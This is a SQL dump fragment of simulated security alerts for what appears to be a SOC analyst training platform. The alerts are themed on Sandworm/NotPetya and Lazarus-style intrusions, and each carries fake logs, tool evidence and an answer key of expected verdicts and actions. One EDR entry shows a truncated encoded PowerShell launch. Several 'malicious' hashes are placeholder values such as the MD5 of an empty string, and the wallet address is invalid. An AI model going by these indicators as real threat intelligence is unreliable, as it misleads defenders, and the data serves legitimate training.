'{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(990, 'Data Exfiltration and Destruction', 'critical', 'File Integrity Monitoring', 'In the final phase, Sandworm attempts to exfiltrate valuable data before unleashing the wiper functionality of NotPetya, leading to permanent data loss and crippling the subsidiary\'s operations.', 'Data Destruction', 'T1485 - Data Destruction', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"FIM-987654\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"user\":\"jdoe\",\"file_path\":\"/var/www/html/backup.sql\",\"action\":\"delete\",\"hash\":\"c1a5298f939e87e8f962a5edfc206918\",\"malware\":\"NotPetya\",\"file_size\":\"45MB\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"severity\":\"Critical\"}', '2026-01-17 03:41:59', '2026-02-16 17:50:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Sandworm APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in the data destruction phase.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account possibly compromised during the attack.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"c1a5298f939e87e8f962a5edfc206918\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya wiper malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"/var/www/html/backup.sql\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Integrity Logs\",\"verdict\":\"suspicious\",\"details\":\"File marked for deletion during data exfiltration and destruction.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.680Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"FIM-987654\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"/var/www/html/backup.sql\\\",\\\"action\\\":\\\"delete\\\",\\\"hash\\\":\\\"c1a5298f939e87e8f962a5edfc206918\\\",\\\"malware\\\":\\\"NotPetya\\\",\\\"file_size\\\":\\\"45MB\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.680Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"FIM-987654\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"/var/www/html/backup.sql\\\",\\\"action\\\":\\\"delete\\\",\\\"hash\\\":\\\"c1a5298f939e87e8f962a5edfc206918\\\",\\\"malware\\\":\\\"NotPetya\\\",\\\"file_size\\\":\\\"45MB\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.680Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"FIM-987654\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"/var/www/html/backup.sql\\\",\\\"action\\\":\\\"delete\\\",\\\"hash\\\":\\\"c1a5298f939e87e8f962a5edfc206918\\\",\\\"malware\\\":\\\"NotPetya\\\",\\\"file_size\\\":\\\"45MB\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.680Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"FIM-987654\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"/var/www/html/backup.sql\\\",\\\"action\\\":\\\"delete\\\",\\\"hash\\\":\\\"c1a5298f939e87e8f962a5edfc206918\\\",\\\"malware\\\":\\\"NotPetya\\\",\\\"file_size\\\":\\\"45MB\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.680Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"FIM-987654\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_path\\\":\\\"/var/www/html/backup.sql\\\",\\\"action\\\":\\\"delete\\\",\\\"hash\\\":\\\"c1a5298f939e87e8f962a5edfc206918\\\",\\\"malware\\\":\\\"NotPetya\\\",\\\"file_size\\\":\\\"45MB\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"severity\\\":\\\"Critical\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(991, 'Initial Access via Phishing Email', 'high', 'Email server logs', 'A spear-phishing email was sent to a Ronin employee with the intent to obtain network credentials. The email contained a malicious link leading to a credential harvesting site.', 'Phishing Attack', 'T1566.001', 1, 'Closed', 74, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"source_ip\":\"185.143.172.101\",\"destination_ip\":\"192.168.1.45\",\"source_email\":\"hr@ronin-security.com\",\"destination_email\":\"john.doe@ronin-security.com\",\"subject\":\"Urgent: Please Review the Attached Document\",\"attachment\":\"ProjectDetails.docx\",\"malicious_link\":\"http://malicious-site.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36\",\"malware_hash\":\"9c9c1c8a5f1c4e5a6c7e1e8f9f4b3c7d\"}', '2026-01-17 03:42:27', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.172.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known phishing server associated with Lazarus Group\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"john.doe@ronin-security.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Email Directory\",\"verdict\":\"internal\",\"details\":\"Employee of Ronin\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"Phishing site designed to harvest credentials\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"9c9c1c8a5f1c4e5a6c7e1e8f9f4b3c7d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with known malware campaigns\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Email\",\"date\":\"2026-02-01T20:32:22.682Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(992, 'Execution of Destructive Malware', 'high', 'Endpoint detection logs', 'The endpoint detection system has identified the execution of a known destructive malware variant associated with the Lazarus Group. The malware was executed to disable security measures, allowing attackers to move undetected within the network. Immediate containment actions are recommended to prevent further damage.', 'Malware Deployment', 'T1486 - Data Encrypted for Impact', 1, 'Closed', 74, '{\"timestamp\":\"2023-10-11T08:45:27Z\",\"event_id\":\"EVT-202310110001\",\"source_ip\":\"185.123.231.12\",\"internal_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"malware_filename\":\"destructo.exe\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"execution\",\"message\":\"Destructive malware detected and executed on host 192.168.1.10 by user jdoe. Associated with Lazarus Group activities.\"}', '2026-01-17 03:42:27', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.123.231.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Associated with known Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host where malware was executed.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"destructo.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Identified as destructive malware used by Lazarus Group.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known destructive malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(993, 'Establishing Persistence via Backdoor', 'medium', 'Network traffic analysis', 'The attackers installed a backdoor, ensuring they could re-enter the network as needed to continue their operation. This activity is consistent with tactics used by the Lazarus Group.', 'Backdoor Installation', 'TA0003 - Persistence', 1, 'new', 74, '{\"timestamp\":\"2023-10-01T14:45:00Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.15\",\"protocol\":\"TCP\",\"src_port\":443,\"dst_port\":8080,\"filename\":\"backdoor_installer.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"jdoe\",\"action\":\"File executed\",\"description\":\"A suspicious executable associated with known Lazarus Group activity was detected being executed on the network.\"}', '2026-01-17 03:42:27', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with Lazarus Group operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in the event.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"backdoor_installer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used in Lazarus Group campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Lazarus Group.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account on the network.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(994, 'Lateral Movement to Validator Nodes', 'high', 'Active Directory logs', 'Indicators of credential dumping were identified, suggesting lateral movement within the network, targeting validator nodes. This activity aligns with known tactics and techniques of the Lazarus Group.', 'Credential Dumping', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"logon_type\":\"3\",\"account_name\":\"jdoe\",\"source_ip\":\"203.0.113.42\",\"target_ip\":\"192.168.1.10\",\"process_name\":\"lsass.exe\",\"hash\":\"3f6d7c9e1b2f4d3e9a7fbc7e5a8e9ea6\",\"domain\":\"company.local\",\"message\":\"An attempt to dump credentials was detected from IP 203.0.113.42 targeting IP 192.168.1.10 using the process lsass.exe.\"}', '2026-01-17 03:42:27', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal validator node targeted for compromise.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f6d7c9e1b2f4d3e9a7fbc7e5a8e9ea6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a credential dumping tool used by the Lazarus Group.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"lsass.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"System Process\",\"verdict\":\"clean\",\"details\":\"Legitimate system process potentially exploited for credential dumping.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(995, 'Exfiltration of Cryptocurrency', 'critical', 'Blockchain transaction logs', 'With control over the validator nodes, the attackers exfiltrated $625 million in cryptocurrency, executing the largest crypto heist in history.', 'Data Exfiltration', 'T1567.002', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"event_id\":\"0x1a2b3c\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"transaction_id\":\"0x9f8b7a9d\",\"amount\":\"625000000\",\"currency\":\"USD\",\"wallet_address\":\"0x123abc456def789ghi101112jklmno\",\"malware_hash\":\"b8c7b15d3ef9a8f2e3c9a4f6d3e7a9d1\",\"user\":\"attacker_account\",\"filename\":\"transaction_exfil.exe\"}', '2026-01-17 03:42:27', '2026-02-16 17:49:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP used for transaction initiation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b8c7b15d3ef9a8f2e3c9a4f6d3e7a9d1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Associated with destructive malware used by Lazarus Group.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"transaction_exfil.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable used for exfiltrating cryptocurrency.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.687Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":\\\"0x1a2b3c\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"transaction_id\\\":\\\"0x9f8b7a9d\\\",\\\"amount\\\":\\\"625000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"wallet_address\\\":\\\"0x123abc456def789ghi101112jklmno\\\",\\\"malware_hash\\\":\\\"b8c7b15d3ef9a8f2e3c9a4f6d3e7a9d1\\\",\\\"user\\\":\\\"attacker_account\\\",\\\"filename\\\":\\\"transaction_exfil.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.687Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":\\\"0x1a2b3c\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"transaction_id\\\":\\\"0x9f8b7a9d\\\",\\\"amount\\\":\\\"625000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"wallet_address\\\":\\\"0x123abc456def789ghi101112jklmno\\\",\\\"malware_hash\\\":\\\"b8c7b15d3ef9a8f2e3c9a4f6d3e7a9d1\\\",\\\"user\\\":\\\"attacker_account\\\",\\\"filename\\\":\\\"transaction_exfil.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.687Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":\\\"0x1a2b3c\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"transaction_id\\\":\\\"0x9f8b7a9d\\\",\\\"amount\\\":\\\"625000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"wallet_address\\\":\\\"0x123abc456def789ghi101112jklmno\\\",\\\"malware_hash\\\":\\\"b8c7b15d3ef9a8f2e3c9a4f6d3e7a9d1\\\",\\\"user\\\":\\\"attacker_account\\\",\\\"filename\\\":\\\"transaction_exfil.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.687Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":\\\"0x1a2b3c\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"transaction_id\\\":\\\"0x9f8b7a9d\\\",\\\"amount\\\":\\\"625000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"wallet_address\\\":\\\"0x123abc456def789ghi101112jklmno\\\",\\\"malware_hash\\\":\\\"b8c7b15d3ef9a8f2e3c9a4f6d3e7a9d1\\\",\\\"user\\\":\\\"attacker_account\\\",\\\"filename\\\":\\\"transaction_exfil.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.687Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":\\\"0x1a2b3c\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"transaction_id\\\":\\\"0x9f8b7a9d\\\",\\\"amount\\\":\\\"625000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"wallet_address\\\":\\\"0x123abc456def789ghi101112jklmno\\\",\\\"malware_hash\\\":\\\"b8c7b15d3ef9a8f2e3c9a4f6d3e7a9d1\\\",\\\"user\\\":\\\"attacker_account\\\",\\\"filename\\\":\\\"transaction_exfil.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(996, 'Suspicious Multi-Sig Scheme Compromise', 'high', 'Blockchain security monitoring tools', 'An initial access attempt was detected targeting a multi-signature wallet, potentially linked to the Lazarus Group. The operation aims to exploit vulnerabilities in the multi-sig scheme, setting the stage for a cryptocurrency heist.', 'Initial Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-16T08:45:12Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.5\",\"user\":\"admin_user\",\"event\":\"multi-sig_wallet_access_attempt\",\"details\":{\"description\":\"Unauthorized access attempt detected\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"wallet_access_tool.exe\",\"signature\":\"Lazarus Group\"}}', '2026-01-17 03:44:49', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted multi-sig wallet server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known Lazarus Group malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"wallet_access_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Detection\",\"verdict\":\"suspicious\",\"details\":\"Filename used in unauthorized access attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.688Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T08:45:12Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"event\\\":\\\"multi-sig_wallet_access_attempt\\\",\\\"details\\\":{\\\"description\\\":\\\"Unauthorized access attempt detected\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"wallet_access_tool.exe\\\",\\\"signature\\\":\\\"Lazarus Group\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.688Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T08:45:12Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"event\\\":\\\"multi-sig_wallet_access_attempt\\\",\\\"details\\\":{\\\"description\\\":\\\"Unauthorized access 